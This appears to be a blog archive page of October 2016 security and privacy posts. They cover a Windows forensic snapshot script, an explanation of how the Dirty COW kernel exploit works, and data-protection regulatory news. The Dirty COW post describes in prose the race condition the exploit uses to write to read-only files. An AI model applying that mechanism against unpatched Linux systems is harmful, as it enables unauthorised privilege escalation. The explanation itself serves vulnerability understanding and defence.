Monthly Archives: October 2016

Toolsmith – GSE Edition: snapshot.ps1

I just spent a fair bit of time preparing to take the GIAC Security Expert exam as part of the requirement to recertify every four years. I first took the exam in 2012, and I will tell you, for me, one third of the curriculum is a "use it or lose it" scenario. The GSE exam covers GSEC, GCIH, and GCIA. As my daily duties have migrated over the years from analyst to leadership, I had to "relearn" my packet analysis fu. Thank goodness for the Packetrix VM and the SANS 503 exercises workbook, offsets, flags, and fragments, oh my! All went well, mission accomplished, I'm renewed through October 2020 and still GSE #52, but spending weeks with my nose in the 18 course books reminded of some of the great tools described therein. As a result, this is the first of a series on some of those tools, their value, and use case scenarios.
I'll begin with snapshot.ps1. It's actually part of the download package for SEC505: Securing Windows and PowerShell Automation, but is discussed as part of the GCIH curriculum. In essence, snapshot.ps1 represents one script to encapsulate activities specific to the SANS Intrusion Discovery Cheat Sheet for Windows.
The script comes courtesy of Jason Fossen, the SEC505 author, and can be found in the Day 5-IPSec folder of the course download package. The script "dumps a vast amount of configuration data for the sake of auditing and forensics analysis" and allows you to "compare snapshot files created at different times to extract differences."
To use snapshot.ps1 place the script into a directory where it is safe to create a subdirectory as the script creates such a directory named named for the computer, then writes a variety of files containing system configuration data.  Run snapshot.ps1 with administrative privileges.
The script runs on Windows 7, Server 2008, and newer Windows operating systems (I ran it on Windows 10 Redstone 2) and requires PowerShell 3.0 or later. You also need to have autorunsc.exe and sha256deep.exe in your PATH if you want to dump what programs are configured to startup automatically when your system boots and you login, as well as run SHA256 file hashes.
That said, if you must make the script run faster, and I mean A LOT FASTER, leave file
hashing disabled at the end of the snapshot.ps1 for a 90% reduction in run time. 
However, Jason points out that this is one of the most useful aspects of the script for identifying adversarial activity. He also points out that snapshot.ps1 is a starter script; you can and should add more commands. As an example, referring back to toolsmith #112: Red vs Blue - PowerSploit vs PowerForensics, after importing PowerForensics, you could add something like Get-ForensicTimeline | Sort-Object -Property Date | Where-Object { $_.Date -ge "12/30/2015" -and $_.Date -le "01/04/2016" } | WriteOut -FileName Timeline which would give you a file system timeline between the 12/30/2015 and 01/04/2016.But wait, there's more! Want to get autoruns without needing autorunsc.exe?  Download @p0w3rsh3ll's AutoRuns module, run Import-Module AutoRuns.psm1, then Get-Command -Module AutoRuns to be sure the module is on board, and finally comment out autorunsc.exe -accepteula -a -c | Out-File -FilePath AutoRuns.csv then add Get-PSAutorun | WriteOut -FileName AutoRuns.
It's then as simple as running .\Snapshot.ps1 and watch your computer-named directory populate, 0V3RW4TCH-2016-10-31-9-7 in my case, per Figure 1.

Figure 1: Snapshot.ps1 run
Most result files are written in machine-readable XML, CSV, and TXT, as well as REG files generated by the registry exports via reg.exe.
A great example of a results file, is spawned via dir -Path c:\ -Hidden -Recurse -ErrorAction SilentlyContinue | Select-Object FullName,Length,Mode,CreationTime,LastAccessTime,LastWriteTime | Export-Csv -Path FileSystem-Hidden-Files.csv. The resulting CSV is like a journey down evil memory lane, where all the nuggets I've tested in the past leave artifacts. This would be EXACTLY what you would be looking for under real response scenarios, as seen in Figure 2.

Figure 2: Snapshot.ps1 grabs hidden files
Sure, there are bunches of related DFIR collection scripts, but I really like this one, and plan to tweak it further. Good work from Jason, and just one of many reasons to consider taking SEC505, or pursuing your GSE!
Cheers...until next time.

Entry into Force of the French Digital Republic Bill

On October 7, 2016, the French Digital Republic Bill (the “Bill”) was enacted after a final vote from the Senate. The Bill aligns the French legal data protection framework with the EU General Data Protection Regulation (“GDPR”) requirements before the GDPR becomes applicable in May 2018.

Increased Fines

The Bill significantly increases the maximum level of fines for violations of the French Data Protection Act. The French Data Protection Authority (“CNIL”) will be able to immediately impose a fine of up to €3 million (previously, fines could not exceed €150,000) until the GDPR becomes applicable. Once the GDPR becomes applicable, the Bill states that the CNIL will be entitled to exercise the full scope of sanctions prescribed by the GDPR (i.e., fines of up to, as the case may be, (1) €10 million or 2 percent of annual worldwide turnover, or (2) €20 million or 4 percent of annual worldwide turnover).

Right to Data Portability

The Bill also gives any consumer the right to obtain, free of charge, a copy of any of his/her data resulting from the use of a service provided by an online communication service provider, except for data that has been “significantly enriched” by the service provider. A further decree will detail the enrichments that are presumed to be insignificant. Online communication service providers will also be required to make changes to their user interfaces and software to facilitate the transmission of personal data to another service provider, as required by the right to data portability. This provision will enter into force on the same day the GDPR becomes applicable (i.e., May 25, 2018).

Enhanced Information and Control of the Individual of Personal Data

Any data subject will be able to specify their wishes regarding the retention, erasure and transfer of their personal data after death. These wishes can be recorded by a trusted digital third party certified by the CNIL. The data subject can also request that any of their personal data that was collected as a minor is erased.

In anticipation of the GDPR, the Bill also requires data controllers to inform individuals of their data retention period, or if that’s not possible, of the criteria used to determine the retention period.

For the first time in France, the draft of the Bill went through an open public consultation process to involve the public in the law making process and understand the questions and issues raised by the proposals.

Dirty COW Notes

I am not used to write about vulnerabilities because there are too much vulnerabilities out here and writing about just one of them is not going to contribute security community at all. So why am I writing about Diry Cow ? I am going to write about it because, in my personal opinion, it is huge. When I say "huge" I don't really mean it will be used to exploit the "entire world" but I mean it highlights two mains issues:
  • Even patched code could easily hide the same vulnerability, just in a different way. How many patched code are not really "patched" ?
  • A new pragmatic approach to identify vulnerabilities: looking into patched code and check the  patch implementation.
But let's start from the beginning by taking a closer look to the exploit code.

Click to enlarge: Taken From Here

As many other kernel vulnerabilities it relays on concurrency; the exploit code fires on two separate threads who will access at the same time to the same resource.  Taking a closer look to the main function you will see that the mmap syscall has been used.

calling mmap function
From documentation:
creates a new mapping in the virtual address space of the calling process. The starting address for the new mapping is specified in addr. The length argument specifies the length of the mapping.

mmap does not create a memory copy but rather it creates a new mapping of that (filedescriptor) memory area. It means the process will read data directly from the original file rather than from a copy of it.  While most of the parameters are obvious the MAP_PRIVATE flag is the "core" of the vulnerability. It enables the "copy on write" (from here the name COW) which basically copies the original data in a new memory area during the write access to the same data. Since the mmap has just mapped a readonly area and the process wants to write data on it, mmap (MAP_PRIVATE) will create a copy of that data on write actions, the modified data will not be propagated to the original memory area. 

Now the exploit runs two threads which will exploit a race condition to get "write access" to the original memory area. The first thread runs several times the function call madvise (memory advise) which is used to increase process performances by tagging a memory area according to its usage: for example  the memory could be tagged as NORMAL,  SEQUENTIAL, FREE or WILLNEED, an so on... In the exploit, the mmap memory is continuously tagged as DONTNEED,  which basically means the memory is not going to be used in the next future so the kernel could free its space and reload the content only when needed.

First Thread implementing madvise

On the other hand another thread is writing on its own memory space (by abusing the pseudo file notation: /proc/self/mem) directly on the mmap area pointing to the opened file. Since we have invoked the mmap function through the MAP_PRIVATE flag we are not going to write on the specifi memory but on a copy of it (copy on write).

Second Thread implementing write on pseudo self/mem

The race condition between those two threads tricks the write on copy on the original memory area since the copied area could be tagged has DONTNEED while the write procedure is not finished yet. And voilà you are going to write in a readonly file !

OK now we figured out how the trick worked so far but what is most interesting is the story behind it?

Going on issue tracker: Linus Trovalds (maximum respect) wrote:

This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug"). In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly (and do it better). The s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement software dirty bits") which made it into v3.9. Earlier kernels will have to look at the page state itself. Also, the VM has become more scalable, and what used a purely theoretical race back then has become easier to trigger.
S390 is ancient IBM technology.... I am not even sure it still exists on real world (at least if compared to recent systems). Probably linux community forgot about that removal otherwise would left it in the recent memory managers.

Anyhow the bug now "has been fixed" by introducing a new internal Flag called FOLL_COW (really !?J) which basically says "yes I already did the copy on write".
Basically the process can write to even unwritable pte's, but only after it has gone through a COW cycle and they are dirty. Following the diff patch

Dirty Cow Patch3 on October 2016

Dirty Cow vulnerability blowed in my mind a new vulnerability hunting process. On one hand laboratories with extremely sophisticated, tuned and personalised fuzzers perform the "industrial" way (corporate and/or governative) to find new vulnerabilities, on the other hand more romantic and crafty way done by professionals and/or security researchers used to adopt handy works and smart choices. But another smart approach (industrial or romantic) could be to investigate into the patched code by itself.

Patched code is by definition where a bug or issue where located. The most difficult part of finding vulnerabilities (not exploiting them) is to figure out where they are in thousands lines of code. So finding vulnerability on patched code could be much more quick even if with high "hypothetical" complexity since a patch is involved. But as this case testifies ...  is not always the case!

NHTSA Releases New Automobile Cybersecurity Best Practices

The National Highway Safety Administration (“NHTSA”) recently issued non-binding guidance that outlines best practices for automobile manufacturers to address automobile cybersecurity. The guidance, entitled Cybersecurity Best Practices for Modern Vehicles (the “Cybersecurity Guidance”), was recently previewed in correspondence with the House of Representatives’ Committee on Energy and Commerce (“Energy and Commerce Committee”).

According to the NHTSA, the Cybersecurity Guidance is “non-binding guidance” that contains “voluntary best practices” to improve motor vehicle cybersecurity. The Cybersecurity Guidance generally encourages automobiles manufactures to utilize a “layered approach” through adopting the National Institute of Standards and Technology (“NIST”) Cybersecurity Framework and its five principles: identify, protect, detect, respond and recover. NHTSA also recommends the use of certain industry standards such as ISO 27000 series standards, and other best practices, such as the Center for Internet Security’s Critical Security Controls for Effective Cyber Defense. While the Cybersecurity Guidance admits that these standards were developed to mitigate threats against networks and not necessarily automotive devices, it nevertheless contends that they can still be adopted for use in the automotive industry. As with NHTSA’s cyber guidance for autonomous vehicles, the Cybersecurity Guidance also encourages automobile manufacturers to engage in information sharing as well as have a process for vulnerability reporting.

The month before the Cybersecurity Guidance was released, the Energy and Commerce Committee sent NHTSA a letter raising questions concerning cybersecurity risks related to On Board Diagnostics (“OBD-II”) ports, calling on NHTSA to establish an industry-wide working group on the subject. The Cybersecurity Guidance does not directly address OBD-II ports, though it does call for operational limits on “control vehicle maintenance diagnostic access” and calls on the automotive industry to consider the effects of aftermarket devices like insurance dongles and cell phones that are connected to vehicle information systems. Furthermore, in its response to the Energy and Commerce Committee, NHTSA indicated that at their request, “SAE International has started a working group that is looking to explore ways to harden the OBD-II port.”

On October 28, 2016, NHTSA published a request for public comments on the Cybersecurity Guidance and has opened a docket for those comments. Comments are due on November 28, 2016.

Regulation on the Online Protection of Minors Published for Comment in China

Recently, the Cyberspace Administration of China published for public comment a draft of the Regulations on the Online Protection of Minors (“Draft Regulations”). The Draft Regulations are open for comment until October 31, 2016.

The Draft Regulations stipulate certain requirements are applicable to the online collection and use of personal information of minors. Under the Draft Regulations, any entity that collects or uses personal information of minors via the Internet must place a warning label at an easily visible position, stating the source, content and purpose of the collection of the information. That entity must then obtain the consent of the minors, or of their guardians. These entities are required to adopt specific rules for the collection and use to strengthen the online protection of personal information of minors.

If a minor, or his or her guardian, requests an Internet information service provider to delete or block the minor’s personal information, the Internet information service provider must abide by the request.

The Draft Regulations also stipulate that Internet information service providers who provide online gaming services must require online gamers to provide authentic identity information when registering. The cybersecurity authority will establish a blacklist of entities that have failed to protect the personal information of minors online.

Under the Draft Regulations, “personal information of minors” refers to all information that is recorded, whether electronically or otherwise, and can be used to identify a minor, whether individually or in combination with other information. The term includes name, location, address, date of birth, contact information, account name, identity card number, personal biological identification information and portrait, etc., of a minor.

An entity that violates the requirements in the Draft Regulations that apply to the collection and use of personal information of minors may face administrative penalties, including a warning and a requirement to effect a correction, a fine of up to RMB 500,000 and an order to suspend or stop the provision of relevant services.

FCC Adopts Broadband Consumer Privacy Rules

This post has been updated. 

On October 27, 2016, the Federal Communications Commission (“FCC”) announced the adoption of rules that require broadband Internet Service Providers (“ISPs”) to take steps to protect consumer privacy (the “Rules”). According to the FCC’s press release, the Rules are intended to “ensure broadband customers have meaningful choice, greater transparency and strong security protections for their personal information collected by ISPs.” 

The Rules require ISPs to obtain customer consent for the use and disclosure of customer information as follows:

  • Opt-in: ISPs are required to obtain affirmative “opt-in” consent from consumers to use and share sensitive information, including precise geolocation data, financial information, health information, children’s information, Social Security numbers, web browsing history, app usage history and the content of communications.
  • Opt-out: ISPs may use and share non-sensitive customer information unless a customer “opts-out.” All other individually identifiable customer information (e.g., email address or service tier information) is considered non-sensitive and the use and sharing of such information is subject to opt-out consent.
  • Exceptions to consent requirements: Customer consent is inferred for certain purposes, including the provision of broadband service or billing and collection. For the use of this type of information, the Rules do not require additional customer consent beyond the establishment of the customer-ISP relationship.

The Rules also:

  • Require ISPs to provide customers with clear, conspicuous and persistent notice about the information they collect, how it may be used and with whom it may be shared, as well as how customers can change their privacy preferences.
  • Require broadband providers to engage in reasonable data security practices. To that end, the Rules provide guidelines on steps ISPs should consider taking to protect customer data, including (1) implementing relevant industry best practices, (2) providing appropriate oversight of security practices, (3) implementing robust customer authentication tools, and (4) properly disposing of data.
  • Impose data breach notification requirements as follows: In the event that an ISP determines that unauthorized disclosure of a customer’s personal information has occurred, unless the ISP determines that no harm is reasonably likely to occur, the ISP must notify (1) affected customers no later than 30 days after the determination has been made; (2) if the breach affected 5,000 or more customers: the FCC, FBI and U.S. Secret Service, no later than seven business days after the determination has been made; and (3) the FCC at the same time customers are notified if the breach affected fewer than 5,000 customers.
  • Prohibit “take-it-or-leave-it” offers, meaning that an ISP cannot refuse to serve customers who do not consent to the use and sharing of their information for commercial purposes.

According to the FCC’s press release, the Rules do not apply to the privacy practices of websites and other “edge services” over which the FTC has authority. In addition, the scope of the Rules does not include other services of broadband providers, such as the operation of social media websites, or issues such as government surveillance, encryption or law enforcement.

Next Steps

According to the FCC’s press release:

  • the requirements related to Notice and Choice will become effective approximately 12 months after publication of the summary of the Order in the Federal Register. Small providers will have an additional 12 months to comply;
  • the data security requirements will go into effect 90 days after publication of the summary of the Order in the Federal Register; and
  • the data breach notification requirements will become effective approximately six months after publication of the summary of the Order in the Federal Register.

UPDATE: On November 2, 2016, the FCC released the full text of the rules.

Privacy Blog Nominated for Best AmLaw Blog of 2016 – Please Vote To Help Us Win!

Hunton & Williams LLP is proud to announce our Privacy & Information Security Law Blog has been nominated in The Expert Institute’s 2016 Best Legal Blog Contest for Best AmLaw Blog of 2016. From all of the editors, lawyers and contributors that make our blog a success, we appreciate your continued support and readership, and ask that you please take a moment to vote for our blog!

The Privacy & Information Security Law Blog was ranked as the #1 Privacy & Data Security blog in LexBlog’s 2015 AmLaw 200 Blog Benchmark Report, and named PR News’ Best Legal PR Blog in 2011. It was noted that the “privacy blog influences global privacy and data security developments.”

Click to vote.

Irish Privacy Advocacy Group Challenges EU-U.S. Privacy Shield

A recent update on the Court of Justice of the European Union’s (the “CJEU’s”) website has revealed that Digital Rights Ireland, an Irish privacy advocacy group, has filed an action for annulment against the European Commission’s adequacy decision on the EU-U.S. Privacy Shield (the “Privacy Shield”).

Digital Rights Ireland has yet to comment on its action, but media sources quote a spokesperson for the European Commission acknowledging the case and stressing the European Commission’s conviction that the Privacy Shield meets all legal requirements. At present, no documents have been published in relation to the case; the only information currently available on the CJEU’s website is that the action was filed on September 16, 2016.

The Privacy Shield was adopted on July 12, 2016, as the successor to the U.S.-EU Safe Harbor Framework that was invalidated by the CJEU in October 2015. The Privacy Shield is designed to protect the fundamental rights of individuals whose personal data is transferred to the U.S. and ensure legal certainty for businesses with respect to transatlantic transfers of personal data.

APEC Cross-Border Privacy Rules System Poised for Expansion

On October 21, 2016, the Vietnam e-Commerce and Information Technology Agency and APEC co-hosted an APEC Cross-Border Privacy Rules (“CBPR”) system capacity-building workshop in Da Nang, Vietnam, on the heels of last week’s bilateral affirmation of commitment between the U.S. and Japan to implement and expand the CBPR system. The workshop further signals the continuing growth of the CBPR system.

The workshop, Readiness for the Cross-Border Privacy Rules System in APEC, was organized under the auspices of APEC’s “CBPR Multi-Year Project” which is dedicated to providing funding to APEC countries that wish to join the CBPR system. The workshop brought together Asia-Pacific-based government officials, privacy and data governance experts, third-party certifiers and online dispute resolution providers, as well as Vietnamese private sector stakeholders, to discuss the state of CBPR implementation in Vietnam and other APEC economies.

Featured prominently in the workshop was a draft report conducted by the Vietnam e-Commerce and Information Technology Agency entitled, “Survey on the Readiness for Joining CBPRs.” The report surveyed APEC member countries about their intent to join Canada, the U.S., Mexico and Japan in the CBPR system. The responses were highly promising; Korea, Singapore and the Philippines reported that they “plan to join,” and Australia, Hong Kong, Russia, Taiwan and Vietnam are “considering” joining. The comments on the ground were even more promising. For example, the representative from the Philippines predicted that his country will join the CBPR system within one to two years. Of course, several workshop participants cautioned that there are various unresolved issues that need to be addressed before their countries could join. The issues include, for example, which government agency would lead the application process or be responsible for enforcement of the CBPR, and how to structure the certification process to ensure its scalability to companies of all sizes. To address these issues and others, the workshop brought in a number of international experts, some of whom have been significantly involved in either the creation or implementation of the CBPR system, or have other relevant experience in the governance of cross-border data flows, organizational accountability and data protection management.

Developed by the 21 APEC member economies, the APEC CBPR system is a regional, multilateral, cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. Currently, the U.S., Mexico, Canada and Japan are participants in the APEC CBPR framework.

FTC Issues Guide for Businesses on Handling Data Breaches

On October 25, 2016, the Federal Trade Commission released a guide for businesses on how to handle and respond to data breaches (the “Guide”). The 16-page Guide details steps businesses should take once they become aware of a potential breach. The Guide also underscores the need for cyber-specific insurance to help offset potentially significant response costs.

The Guide lists several actions for a business to take if it suspects or confirms it has experienced a data breach. These include securing operations, fixing vulnerabilities and notifying appropriate parties. According to the Guide, businesses should consider “assembl[ing] a team of experts to conduct a comprehensive breach response,” including independent forensic investigators and outside legal counsel.

The Guide also emphasizes the importance of breach notification and stresses that notification should be made to individuals, other affected businesses, regulators and law enforcement, taking into account all applicable state data breach notification laws and federal regulations (e.g., the HIPAA Breach Notification Rule or the Gramm-Leach-Bliley Act). The Guide also highlights the need for expedient notification to allow affected parties to take steps to protect their information as soon as possible, and provides a model breach notification letter.

Finally, the Guide serves as yet another reminder to businesses to ensure that their cybersecurity programs include both adequate cybersecurity safeguards and appropriate insurance coverages, including first-party and third-party cyber/crime insurance coverages. Failure to maintain either component may hinder an appropriate cyber response as well as limit or preclude coverage for any resulting cyber losses and expenses.

Wrong About Presentations

But first- this series is a bit off-the-cuff and lacking in polish, but I’ve been meaning to do it for ages and if I wait, well, this blog continues to look abandoned.  So please forgive the rambling and read on.

Today let’s start talking about presentations.

I have heard and read that they are all too long, except the ones that are too short.  That talks are simultaneously too technical and too high-level.  Oh, and all panels suck.  Ted-style talks are the best, except that they are hollow, empty, and don’t work for highly technical content.  And you should never let vendors speak because we’re all just sales weasels, except for the events where only “sponsors” get to speak.

Let me once again venture into crazy talk: it really depends on who you are and what you want.  I don’t like vendor sales pitches, but apparently some folks find them a good use of their time.  I’d rather avoid those kind of talks, but that’s me (and probably you, too, but whatever).  If sales presentations are a good use of your time, that’s OK with me.  I do hope you do some homework before whipping out the old purchase orders, though.

I will say that a lot of presentations I’ve seen could have been delivered better in a shorter timeframe- but that’s as much on the events as the speakers.  If the only choice is an hour slot, people do an hour talk.  I do think the quality of things like Shmoocon Firetalks is in part because people often pare down what they planned to be a longer talk, leaving only the key points and deliver them in a short time.  Scheduling talks of different lengths does pose real logistical challenges for conference organizers, but I think it would be good to make it easy for people to do shorter talks.  Of course, speaker ego can be an issue, we need to make it clear that the quality of the talk is not tied to the length of the talk.  I also thing that shorter talks make it easier to get new things in front of an audience.

Presentation style, there’s a topic sure to inflame absolutists.  The style has to match the speaker and the topic.  You will never do a good Ted-style talk that walks through the code of your new project or steps through disassembly of malware.  Conversely, a code walk isn’t the way to explain big picture issues.  Lately my presentations weave the ideas and information together via storytelling, in a style that sometimes borders on stand-up comedy.  And it works for me and the less technical topics I’ve covered in the past few years, but it certainly won’t work for everyone or every topic.  I know there are disciples of some books and styles such as Presentation Zen and Slide:ology, I think they are great resources but as always there is no One True Way.  Do what works for your audience and for you.

As far as panels, many are indeed often a lazy attempt at getting on the schedule, they’re frequently poorly moderated and wander off topic into incoherent ramblings.  It is also true that well-run panels can showcase display a diverse set of opinions and experiences and add nuance to complicated topics.  Panels do not suck, bad panels suck.

And no, this series isn’t over, I’m just getting warmed up.



ART – Panda’s Intelligent Control Platform


In the complex world of IT security, real-time information is fundamental to protect corporate data and resources. Most enterprises are aware that if they do not have complete visibility of their network, it is easy to fall victim to cyber-attacks.

Although a large focus has been placed on external threats such as Ransomware, businesses are also at risk from internal threats.

Employees have access to immense amounts of company data daily, and often organisations are not able to track what employees are accessing and what they are doing with company data. Without proper security in place employees can be the organisation’s biggest threat, as was the case with now infamous Edward Snowden and Bradley Manning. Snowden, stole and published classified NSA documents, and Manning, formerly a US army soldier disclosed confidential military and diplomatic documents to WikiLeaks.
Organisations need to be aware of, and manage such internal threats, in addition to the ever present external threats as such Ransomware and APT’s.

Managing the actions of all employees is a mammoth task whether the organisation has 10 or 10 000 employees. Businesses need to leverage new technology to reduce this burden, technology such as Panda Security’s new Advanced Reporting Tool. This efficient and easy-to-use tool analyses data to gain insight into corporate resource usage in order to make informed strategic decisions.


ART automatically generates security intelligence allowing businesses to take control of all your endpoints and combat poor internal practices.

Advanced Reporting Tool (ART) is an add-on for Panda’s Endpoint Detection and Response solution, Adaptive Defense, and enables information about all the processes running, gathered by Adaptive Defense, to be extracted, stored and correlated by ART. The platform automatically generates security intelligence and allows users to identify risky behaviours or problems – ultimately exposing any misuse of the corporate network or resources.

In short, ART allows IT administrators to:

  • Search relevant information. Increasing efficiencies by enabling IT staff to find any problem areas.
  • Pinpoint problems by extracting behaviour patterns from resources and users, as well as identifying its impact on the business.
  • Real-time alerts about any possible data breaches.
  • Generate configurable reports showing the status of key security indicators and how they are evolving.

Advanced Reporting Tool – a real-time diagnosis tool that enables full visibility of the network.

In addition to the existing Big Data Cloud Service and its real-time alerts, ART includes predefined and adaptable analysis with four different action areas:

  • Information about IT security incidents. ART generates security intelligence then processes and associates those events as intrusion attempts.
  • Controls network applications and resources.
  • Controls access to business data.
  • Displays file access with confidential information and its online traffic.


The SIEMFeeder platform enables businesses to take advantage of Big Data and maximise resources.

Many organisations are taking further steps to ensure they are protected from threats by implementing a SIEM solution. As an alternative or compliment to the Advanced Reporting Tool, Panda Security has developed SIEMFeeder – an add-on that enables communication between Adaptive Defense and users’ existing SIEM tool.

SIEMFeeder provides relevant data, amplifies information and associates it with the information you already have, enabling detection of risk areas before they become the biggest threat to your business.

The post ART – Panda’s Intelligent Control Platform appeared first on

Court Rules Fraud Involving a Computer Is Not ‘Computer Fraud’ under Crime Protection Policy

On October 18, 2016, the United States Court of Appeals for the Fifth Circuit held in Apache Corp. v. Great American Ins. Co., No 15-20499 (5th Cir. Oct. 18, 2016), that a crime protection insurance policy does not cover loss resulting from a fraudulent email directing funds to be sent electronically to the imposter’s bank account because the scheme did not constitute “computer fraud” under the policy.


An employee at Apache Corporation, an oil production company based in Houston, Texas, with worldwide operations, received a telephone call from an individual identifying himself as a representative of Petrofac, a vendor of Apache. The caller instructed the Apache employee to change the bank account to which payments to Petrofac were made. The employee requested that confirmation of the change request be provided on Petrofac’s letterhead.

Shortly thereafter, the fraudsters provided the Apache accounts-payable department with an email of the request on Petrofac letterhead. The letter also included a phony telephone number, which Apache personnel used to confirm the requested change. Apache then proceeded to make payment to the fraudulent account when it came time to pay Petrofac’s invoices. Within one month, Apache was notified that Petrofac had not received approximately $7 million in payments that had been sent to the fraudulent account. Apache recouped a portion of the payments from its bank and attempted to recover the balance from its insurer.

Apache was insured under a crime-protection insurance policy issued by Great American Insurance Company (“GAIC”). Apache submitted a claim to GAIC for reimbursement of the unrecovered funds under the policy’s computer-fraud coverage, which afforded coverage for loss “resulting directly from the use of any computer to fraudulently cause a transfer” of money or property to a person or place outside the company. GAIC denied coverage, claiming that the loss did not directly result from the use of a computer nor did the use of a computer cause the transfer of the funds. Apache filed suit in Texas state court and GAIC removed. The federal district court sided with Apache and held that the intervening steps of the phone call and approval of the change request by Apache’s supervisors did not alter the fact that the fraudsters used a computer to perpetrate the fraud. The district court also held that GAIC’s construction of the policy would effectively limit the policy to affording coverage only for computer hacking, thus rendering the policy “pointless.”

Read the full alert.

Privacy Partner Aaron Simpson Switches to London to Guide Multinationals Through Unprecedented UK and EU Challenges

Earlier this month, Hunton & Williams announced that Global Privacy and Cybersecurity partner Aaron P. Simpson has switched to London from the firm’s New York office. He will continue his work on behalf of clients as a leader of the firm’s Global Privacy and Cybersecurity practice.

“There is growing European interest in the U.S. Privacy Shield and in cybersecurity issues, areas in which Aaron has particular experience,” said Bridget Treacy, managing partner of the firm’s London office. “I am delighted to have Aaron on board; having him in London adds additional strength and capacity to our team here, enabling us to better serve our local clients.”

Simpson helped develop the firm’s renowned global privacy practice that began nearly 15 years ago. He is widely recognized for his work with clients on a broad range of complex global data protection and cybersecurity matters. These range from internal investigations into large-scale cybersecurity incidents to the development of cross-border data transfer solutions, compliance with existing and emerging data protection requirements in Europe and around the globe, and negotiating data-driven commercial agreements. Among his many awards and recognitions, Simpson has been recognized for his work on behalf of clients by The Legal 500 as a Leading Lawyer in Cyber Law.

“Our client roster is internationally renowned, and the monumental legal and political changes in the UK and Europe have created unprecedented challenges for multinationals seeking to successfully navigate the changing landscape,” said Simpson. “I look forward to helping our clients overcome these challenges.”

Cutting through the Dyn

Last Friday (21 Oct), one of the largest DDoS attacks ever seen, created widespread internet outage affecting services from Twitter, AWS, Reddit, Netflix, Spotify, CNN, Paypal, NY Times, WSJ, and others. The attack was directed at Dyn, a domain name service provider, whose servers interpret internet addresses, directing web traffic to the affected companies. Dyn …

European Commission Proposes Changes to Data Export Decisions

Earlier this month, at a meeting of the Article 31 Committee, the European Commission (“Commission”) unveiled two draft Commission Implementing Decisions that propose amendments to the existing adequacy decisions and decisions on EU Model Clauses.

Adequacy decisions establish whether a third country provides adequate safeguards to protect personal data, and decisions are made by the Commission following its assessment of a country’s national law and international commitments on data protection. Countries deemed to be adequate are added to the Commission’s ‘white list’ and transfers can be made from the EEA to that country without requiring further safeguards.

The Commission’s move to amend the decisions follows the ruling of the Court of Justice of the European Union (“CJEU”) in the Schrems case. In its ruling, the CJEU held that the EU-U.S. Safe Harbor data transfer framework was invalid. The Commission’s proposed amendments remove provisions restricting DPAs’ power in the existing adequacy decisions and under EU Model Clauses.

A number of the EU Member States that presented at the Article 31 Committee meeting were in favor of the two amendments, although others requested more time to consider the proposed changes before making a decision. As a result, it was agreed that another meeting would be scheduled. In the meantime, the Article 29 Working Party will be asked to present its views on the amendments. The draft texts have yet to be made public.

U.S. and Japan Commit to Improve and Advance Cross-Border Privacy

On October 19, 2016, the International Trade Administration issued a press release reaffirming the commitment of both the U.S. Department of Commerce and Japan’s Personal Information Protection Commission (the “PPC”) to continue implementation of the APEC Cross-Border Privacy Rules (“CBPR”) system in order to foster the protection of personal information transferred across borders. According to the press release, the PPC’s “recent decision to recognize the system as a mechanism for international data transfers in the implementing guidelines for Japan’s amended privacy law marks an important milestone for the development of the APEC CBPR system in Japan.” Going forward, both agencies also have committed to cooperate in raising awareness and encouraging other APEC member economies to implement the CBPR system.

Developed by the 21 APEC member economies, the APEC CBPR system is a regional, multilateral, cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. Currently, the U.S., Mexico, Canada and Japan are participants in the APEC CBPR framework.

Startup Security Weekly #13 – Gimme Some Moore

HD Moore, founder of the Metasploit project, joins us for an interview. In startup news, we talk about  the differences between Angel and VC investments, expanding the concept of entrepreneurship, is running a startup for you?, how to become a cybersecurity entrepreneur in a crowded market, and making your elevator pitch more memorable. Stay tuned!

NHTSA Set to Release New Automobile Cybersecurity Best Practices

On October 14, 2016, the National Highway Transportation Administration (“NHTSA”) indicated in a letter to Congress that it intends to issue new best practices on vehicle cybersecurity. This letter came in response to an earlier request from the House Committee on Energy and Commerce (“Energy and Commerce Committee”) that NHTSA convene an industry-wide effort to develop a plan to address vulnerabilities posed to vehicles by On-Board Diagnostics (“OBD-II”) ports. Since 1994, the Environmental Protection Agency has required OBD-II ports be installed in all vehicles so that they can be tested for compliance with the Clean Air Act. OBD-II ports provide valuable vehicle diagnostic information and allow for aftermarket devices providing services such as “good driver” insurance benefits and vehicle tracking. Because OBD-II ports provide direct access to a vehicle’s internal network; however, OBD-II ports are widely cited as the central vulnerability to vehicle cybersecurity.

Although the Energy and Commerce Committee requested a plan regarding OBD-II ports specifically, the NHTSA letter reiterates previous NHTSA statements that vehicle cybersecurity should be addressed more comprehensively than “each entry port at a time.” The letter says that NHTSA’s forthcoming guidance will be based on the National Institute of Standards and Technology (“NIST”) Cybersecurity Framework’s five principles: identify, protect, detect, respond and recover.

Coming not long after NHTSA released guidance on autonomous vehicles which called for increased information sharing within the automotive sector, NHTSA’s reliance on the NIST Cybersecurity Framework in its vehicle cybersecurity guidance indicates that NHTSA is increasingly seeking to apply cybersecurity measures to passenger vehicles currently utilized within critical infrastructure. Indeed, the NIST Cybersecurity Framework was developed pursuant President Obama’s E.O. 13636, Improving Critical Infrastructure Cybersecurity.

Social Engineering Methods for Penetration Testing Social engineering is the practice of learning and obtaining valuable information by exploiting human vulnerabilities. It is an art of deception that is considered to be vital for a penetration tester when there is a lack of information about the target that can be exploited.

Article 29 Working Party Issues Results of Fablab Workshop on the GDPR

On October 7, 2016, the Article 29 Working Party (the “Working Party”) published a summary of the discussions that took place at its “Fablab” workshop entitled GDPR/from concepts to operational toolbox, DIY, which took place on July 26, 2016, in Brussels.

The Fablab workshop gathered more than 90 participants, including 40 representatives from data protection authorities, to discuss certain operational and practical issues linked to the EU General Data Protection Regulation (“GDPR”) with representatives of industry, civil society, academics and relevant associations. The objective of the workshop was for the Working Party to develop, by the end of this year, best practices and guidelines for the implementation of the GDPR, in particular with respect to the following topics:

